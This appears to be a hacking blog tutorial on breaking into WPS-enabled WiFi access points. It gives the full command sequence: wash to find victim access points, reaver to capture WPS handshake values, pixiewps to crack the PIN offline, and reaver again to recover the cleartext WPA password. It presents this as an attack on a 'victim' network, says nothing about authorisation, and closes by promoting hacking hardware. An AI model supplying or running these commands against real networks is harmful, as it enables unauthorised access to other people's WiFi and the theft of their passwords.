WiFi Hacking: WPS with PixieWPS and Reaver

WiFi Hacking Software: PixieWPS & Reaver in Action

It’s a fast attack. For our sample we are using KALI Linux 2.0. And the already installed WiFi Hacking Tools pixiewps and reaver. We also disclose the full PSK (Password) from the attacked AP. That’s quite nifty!

Reaver: Brute Force Attack on WPS

You probably already know it: With the use of Reaver you can break (non-protected) WPS AP’s easily. But… It takes it’s time: between 2 and 10 hours. It all depends on the PIN Code which is used on the AP. Reaver endlessly challenges the WPS AP – PIN by PIN. We will go deeper into detail on another article dedicated on Reaver.

Now we use Reaver for a quite simple job: We catch the PKE, E-Hash1, E-Hash2 und AuthKey from our Victim AP. This way is tricky, since we can avoid the lockout mechanismen of some AP’s. But at first, let’s locate a victim. We are using Wash for that.

Wash: Finding WPS enabled AP’s

Before we start with Wash, we need to create a “mon” (Monitor) interface on KALI Linux. It’s done easily. Our WLAN Interface is “wlan2”. Adjust all values to your own WLAN-Interface. You can find that out by running

ifconfig -a

In our case we detect


as WiFi interface.

Next we start the WiFi monitoring interface by running

airmon-ng wlan2 start

which creates finally the monitoring interface “wlan2mon”. Verify it’s existing by running again

ifconfig -a

Now we are running wash:

wash -i wlan2mon

In our case we found an AP named “TargetWLAN” with the MAC-Address “BC:14:01:7E:C3:68”. Adjust the MAC-Adress to your Target’s MAC.

Reaver attacks the AP once

Now we run a very simple single attack with Reaver:

reaver -i wlan2mon -b BC:14:01:7E:C3:68 -vv -S

After you get one sequence of PKE, E-Hash1, E-Hash2 and AuthKey, hit CTRL-C. Looks like this when i did:

Wifi Hacking Software WPS Reaver Wash PixieWPS
Click to Zoom and checkout the sample)

Now we got:

  • PKE
  • E-Hash1
  • E-Hash2
  • AuthKey

We are ready to attack these combination – with PixieWPS.

PixieWPS – Offline WiFi Attack vs WPS Access Point

Lets combine the values of PKE, E-Hash1, E-Hash2 and AuthKey into PixieWPS. I don’t use the real values for this code snippet, since it would burst the screen!


The result will immediately:

 Pixiewps 1.1

 [*] E-S1:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] E-S2:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [+] WPS pin:    83075605

 [*] Time taken: 0 s

We cracked the WPS Pin. It’s “83075605”. Let’s go for more. Now we use Reaver again and go for a one shot to get the PSK (Cleartext Password) for that WiFi!

If it says that WPS Pin not found: That Router is NOT VULNERABLE to PixieWPS!


Reaver One-Shot PSK from WPS Access Point

Since we got the Pin, we can use reaver as sniper rifle. One shot is enough. We add the parameter “-p” with the valid Pin Code. Looks like this:

reaver -i wlan2mon -b BC:14:01:7E:C3:68 -vv -p 83075605

(Replace the Pin Code “83075605” with the Pin Code you just cracked!)

And done. We got the PSK from our Target Access Point!

[+] WPS PIN: '83075605'
[+] AP SSID: 'TargetWLAN'

(WPA PSK removed)

Use that PSK to connect to the AP. You have been successful and hacked a WPS protected AP in less then one minute!

Urgent: For hacking AP’s most efficient, you need the right equipment. Check out our Hardware Page for the very best WiFi Hacking Adapters and Devices:

WiFi Adapters & Devices for Hacking

Tool Links:

Be the first to comment

Leave a Reply

Your email address will not be published.